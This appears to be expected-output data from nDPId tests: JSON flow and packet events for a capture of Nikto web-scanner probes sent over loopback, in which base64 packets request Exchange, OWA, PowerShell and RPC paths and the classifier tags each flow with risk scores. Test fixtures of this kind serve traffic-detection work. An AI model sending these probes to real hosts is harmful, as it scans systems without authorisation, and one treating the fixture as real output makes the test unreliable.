00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1576420276781,"pkt":"AAAAAAAAAAAAAAAACABFAAC+Y8xAAEAG2Gt\/AAABfwAAAcIiH5D+h1vitMrGVIAYAED+sgAAAQEICp1m+1WdZvtVR0VUIC9FeGNoYW5nZSBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7580000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276784,"pkt":"AAAAAAAAAAAAAAAACABFAAC5ylFAAEAGcet\/AAABfwAAAcIkH5CUkvJkMc1am4AYAED+rQAAAQEICp1m+1idZvtYR0VUIC9PV0EgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276786,"pkt":"AAAAAAAAAAAAAAAACABFAADdBqpAAEAGNW9\/AAABfwAAAcImH5DUMj6FKAlSCYAYAED+0QAAAQEICp1m+1qdZvtaR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5lYXMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276787,"pkt":"AAAAAAAAAAAAAAAACABFAAC5+PtAAEAGQ0F\/AAABfwAAAcIoH5AY5sDVvq1OaYAYAED+rQAAAQEICp1m+1udZvtbR0VUIC9ScGMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276787,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276789,"pkt":"AAAAAAAAAAAAAAAACABFAADHn6dAAEAGnId\/AAABfwAAAcIqH5DNYaeJfxts9oAYAED+uwAAAQEICp1m+12dZvtdR0VUIC9FV1MvU2VydmljZXMud3NkbCBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276789,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276790,"pkt":"AAAAAAAAAAAAAAAACABFAAC5NBFAAEAGCCx\/AAABfwAAAcIsH5ClBgwj7e4RBIAYAED+rQAAAQEICp1m+16dZvteR0VUIC9lY3AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276792,"pkt":"AAAAAAAAAAAAAAAACABFAAC5lANAAEAGqDl\/AAABfwAAAcIuH5BArawwwOPk6IAYAED+rQAAAQEICp1m+1+dZvtfR0VUIC9PQUIgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276793,"pkt":"AAAAAAAAAAAAAAAACABFAADD2QRAAEAGYy5\/AAABfwAAAcIwH5DBGuEtmiy9f4AYAED+twAAAQEICp1m+2GdZvthR0VUIC9hc3BuZXRfY2xpZW50IEhUVFAvMS4wDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276793,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276794,"pkt":"AAAAAAAAAAAAAAAACABFAADAoqZAAEAGmY9\/AAABfwAAAcIyH5C3W5qL6yWPx4AYAED+tAAAAQEICp1m+2KdZvtiR0VUIC9Qb3dlclNoZWxsIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420276796,"pkt":"AAAAAAAAAAAAAAAACABFAAC74FpAAEAGW+B\/AAABfwAAAcI0H5AdBth42VHy84AYAED+rwAAAQEICp1m+2SdZvtkR0VUIC4gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBXZWJMb2dpYyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420276797,"pkt":"AAAAAAAAAAAAAAAACABFAADj87RAAEAGSF5\/AAABfwAAAcI2H5ABU8uetZ1IA4AYAED+1wAAAQEICp1m+2WdZvtlR0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0ZSwgZ3ppcA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IEJSRUFDSCBUZXN0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1576420276801,"pkt":"AAAAAAAAAAAAAAAACABFAACv4YVAAEAGWsF\/AAABfwAAAcI4H5Af9dm0Z318ZoAYAED+owAAAQEICp1m+2mdZvtpR0VUIC8gSFRUUC8xLjANCk5pa3RvOiAfDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6QFRFU1RJRCkNCg0K"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
